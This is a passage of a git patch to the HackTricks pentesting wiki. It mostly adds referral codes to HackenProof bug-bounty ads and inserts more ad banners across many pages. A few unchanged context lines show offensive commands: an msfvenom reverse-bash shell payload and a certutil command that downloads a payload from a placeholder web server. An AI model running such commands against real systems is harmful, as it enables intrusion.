From e219464b71ade2d4e9ba3b71f4d469b18fbf83cc Mon Sep 17 00:00:00 2001
From: carlospolop <carlospolop@gmail.com>
Date: Sat, 5 Nov 2022 10:07:43 +0100
Subject: [PATCH] new link

---
 README.md                                     |  4 +--
 .../pentesting-wifi/README.md                 | 12 +++----
 .../shells/msfvenom.md                        | 21 ++++++++++++
 .../shells/windows.md                         | 12 +++----
 .../linux-privilege-escalation-checklist.md   |  8 ++---
 .../README.md                                 | 12 +++----
 .../android-app-pentesting/README.md          | 24 +++++++-------
 .../android-applications-basics.md            | 12 +++----
 .../135-pentesting-msrpc.md                   |  8 ++---
 .../27017-27018-mongodb.md                    | 22 +++++++++++++
 .../5985-5986-pentesting-winrm.md             | 12 +++----
 .../6000-pentesting-x11.md                    | 20 +++++++++++
 .../6379-pentesting-redis.md                  | 33 +++++++++++++++++++
 ...09-pentesting-apache-jserv-protocol-ajp.md | 22 +++++++++++++
 .../README.md                                 | 12 +++----
 network-services-pentesting/pentesting-ntp.md |  8 ++---
 .../README.md                                 | 12 +++----
 .../csrf-cross-site-request-forgery.md        | 12 +++----
 pentesting-web/file-inclusion/README.md       | 12 +++----
 pentesting-web/reset-password.md              |  8 ++---
 pentesting-web/xpath-injection.md             | 33 +++++++++++++++++--
 .../asreproast.md                             | 33 ++++++++++++++++---
 .../stealing-credentials/README.md            | 12 +++----
 23 files changed, 267 insertions(+), 97 deletions(-)

diff --git a/README.md b/README.md
index a2f104948..7ab2aed12 100644
--- a/README.md
+++ b/README.md
@@ -82,9 +82,9 @@ Get Access Today:
 **Become the web3 hacker legend**\
 ****Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
 
-[**Sign up on HackenProof**](https://hackenproof.com/register) to start earning from your hacks!
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to start earning from your hacks!
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ### [WebSec](https://websec.nl/)
 
diff --git a/generic-methodologies-and-resources/pentesting-wifi/README.md b/generic-methodologies-and-resources/pentesting-wifi/README.md
index 0a5747121..df9fb9d55 100644
--- a/generic-methodologies-and-resources/pentesting-wifi/README.md
+++ b/generic-methodologies-and-resources/pentesting-wifi/README.md
@@ -17,9 +17,9 @@
 ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## Wifi basic commands
 
@@ -306,9 +306,9 @@ So broken and disappeared that I am not going to talk about it. Just know that _
 ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## WPA/WPA2 PSK
 
@@ -815,9 +815,9 @@ TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github
 ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 <details>
 
diff --git a/generic-methodologies-and-resources/shells/msfvenom.md b/generic-methodologies-and-resources/shells/msfvenom.md
index 9da18f3ae..eb775d506 100644
--- a/generic-methodologies-and-resources/shells/msfvenom.md
+++ b/generic-methodologies-and-resources/shells/msfvenom.md
@@ -17,6 +17,18 @@
 </details>
 
 
+<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FfinO3sjcfKcruYYBafKC%2Fimage.png?alt=media&#x26;token=7bba2ebb-a679-4357-a859-bff2d9c5136a" alt=""><figcaption></figcaption></figure>
+
+​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
+This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
+Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
+
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
+
+
+
+
 `msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>`
 
 One can also use the `-a` to specify the architecture or the `--platform`
@@ -181,6 +193,15 @@ msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f
 ```
 
 
+<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FfinO3sjcfKcruYYBafKC%2Fimage.png?alt=media&#x26;token=7bba2ebb-a679-4357-a859-bff2d9c5136a" alt=""><figcaption></figcaption></figure>
+
+​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
+This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
+Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
+
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
+
 
 <details>
 
diff --git a/generic-methodologies-and-resources/shells/windows.md b/generic-methodologies-and-resources/shells/windows.md
index a9041d8c7..d6680a638 100644
--- a/generic-methodologies-and-resources/shells/windows.md
+++ b/generic-methodologies-and-resources/shells/windows.md
@@ -19,9 +19,9 @@
 ​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## Lolbas
 
@@ -330,9 +330,9 @@ certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil
 ​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 ****This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## **Cscript/Wscript**
 
@@ -583,9 +583,9 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive
 ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 <details>
 
diff --git a/linux-hardening/linux-privilege-escalation-checklist.md b/linux-hardening/linux-privilege-escalation-checklist.md
index 7c5fa8bed..2fed3d5e7 100644
--- a/linux-hardening/linux-privilege-escalation-checklist.md
+++ b/linux-hardening/linux-privilege-escalation-checklist.md
@@ -17,9 +17,9 @@
 Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 ****This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
 
@@ -166,9 +166,9 @@ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among
 Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 ****This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 <details>
 
diff --git a/macos-hardening/macos-security-and-privilege-escalation/README.md b/macos-hardening/macos-security-and-privilege-escalation/README.md
index d643c8e37..2415e3b54 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/README.md
@@ -17,9 +17,9 @@
 Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## Linux Privesc
 
@@ -458,9 +458,9 @@ launchctl print gui/<user's UID>/com.company.launchagent.label
 Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## Auto Start Extensibility Point (ASEP)
 
@@ -1265,9 +1265,9 @@ sudo killall -HUP mDNSResponder
 Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 <details>
 
diff --git a/mobile-pentesting/android-app-pentesting/README.md b/mobile-pentesting/android-app-pentesting/README.md
index a962922a6..7aad848ec 100644
--- a/mobile-pentesting/android-app-pentesting/README.md
+++ b/mobile-pentesting/android-app-pentesting/README.md
@@ -17,9 +17,9 @@
 ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## Android Applications Basics
 
@@ -62,9 +62,9 @@ adb pull /data/app/com.android.insecurebankv2- Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
 ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## Static Analysis
 
@@ -252,9 +252,9 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains
 ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## Dynamic Analysis
 
@@ -505,9 +505,9 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b
 ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## Automatic Analysis
 
@@ -717,9 +717,9 @@ Useful to detect malware: [https://koodous.com/](https://koodous.com)
 ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## Obfuscating/Deobfuscating code
 
@@ -799,9 +799,9 @@ For more information visit:
 ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 <details>
 
diff --git a/mobile-pentesting/android-app-pentesting/android-applications-basics.md b/mobile-pentesting/android-app-pentesting/android-applications-basics.md
index 4f5cb9032..e1b8c9697 100644
--- a/mobile-pentesting/android-app-pentesting/android-applications-basics.md
+++ b/mobile-pentesting/android-app-pentesting/android-applications-basics.md
@@ -17,9 +17,9 @@
 ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## Android Security Model
 
@@ -135,9 +135,9 @@ If developers, write in Java and the code is compiled to DEX bytecode, to revers
 ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## Intents
 
@@ -463,9 +463,9 @@ Generally the MDM solutions perform functions like enforcing password policies,
 ​​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 <details>
 
diff --git a/network-services-pentesting/135-pentesting-msrpc.md b/network-services-pentesting/135-pentesting-msrpc.md
index 4a9f5b4fa..eed1a55fc 100644
--- a/network-services-pentesting/135-pentesting-msrpc.md
+++ b/network-services-pentesting/135-pentesting-msrpc.md
@@ -17,9 +17,9 @@
 Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## Basic Information
 
@@ -109,9 +109,9 @@ The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/97805
 ​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 <details>
 
diff --git a/network-services-pentesting/27017-27018-mongodb.md b/network-services-pentesting/27017-27018-mongodb.md
index a9514613b..2fcba2341 100644
--- a/network-services-pentesting/27017-27018-mongodb.md
+++ b/network-services-pentesting/27017-27018-mongodb.md
@@ -12,6 +12,17 @@
 
 </details>
 
+
+<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FfinO3sjcfKcruYYBafKC%2Fimage.png?alt=media&#x26;token=7bba2ebb-a679-4357-a859-bff2d9c5136a" alt=""><figcaption></figcaption></figure>
+
+​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
+This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
+Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
+
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
+
+
 ## Basic Information
 
 MongoDB is an [open source](https://whatis.techtarget.com/definition/open-source) database management system (DBMS) that uses a document-oriented database model which supports various forms of data. (From [here](https://searchdatamanagement.techtarget.com/definition/MongoDB))
@@ -112,6 +123,17 @@ The tool [https://github.com/andresriancho/mongo-objectid-predict](https://githu
 
 If you are root you can **modify** the **mongodb.conf** file so no credentials are needed (_noauth = true_) and **login without credentials**.
 
+
+<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FfinO3sjcfKcruYYBafKC%2Fimage.png?alt=media&#x26;token=7bba2ebb-a679-4357-a859-bff2d9c5136a" alt=""><figcaption></figcaption></figure>
+
+​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
+This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
+Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
+
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
+
+
 <details>
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
diff --git a/network-services-pentesting/5985-5986-pentesting-winrm.md b/network-services-pentesting/5985-5986-pentesting-winrm.md
index b000e278f..5041660f4 100644
--- a/network-services-pentesting/5985-5986-pentesting-winrm.md
+++ b/network-services-pentesting/5985-5986-pentesting-winrm.md
@@ -19,9 +19,9 @@
 Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## WinRM
 
@@ -168,9 +168,9 @@ winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
 ​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 ## WinRM connection in linux
 
@@ -333,9 +333,9 @@ Entry_2:
 ​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
 Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
-[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend.
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
 
-{% embed url="https://hackenproof.com/register" %}
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
 
 <details>
 
diff --git a/network-services-pentesting/6000-pentesting-x11.md b/network-services-pentesting/6000-pentesting-x11.md
index 420182e56..a52946fcd 100644
--- a/network-services-pentesting/6000-pentesting-x11.md
+++ b/network-services-pentesting/6000-pentesting-x11.md
@@ -17,6 +17,16 @@
 </details>
 
 
+<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FfinO3sjcfKcruYYBafKC%2Fimage.png?alt=media&#x26;token=7bba2ebb-a679-4357-a859-bff2d9c5136a" alt=""><figcaption></figcaption></figure>
+
+​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
+This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
+Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
+
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
+
+
 # Basic Information
 
 The X Window System (aka X) is a windowing system for bitmap displays, which is common on UNIX-based operating systems. X provides the basic framework for a GUI based environment. X also does not mandate the user interface – individual programs handle this.\
@@ -151,6 +161,16 @@ Now as can be seen below we have complete system access:
 * `port:6000 x11`
 
 
+<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FfinO3sjcfKcruYYBafKC%2Fimage.png?alt=media&#x26;token=7bba2ebb-a679-4357-a859-bff2d9c5136a" alt=""><figcaption></figcaption></figure>
+
+​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
+This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
+Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\
+[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend.
+
+{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
+
+
 <details>
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
diff --git a/network-services-pentesting/6379-pentesting-redis.md b/network-services-pentesting/6379-pentesting-redis.md
index 1d0994756..53d5a283c 100644
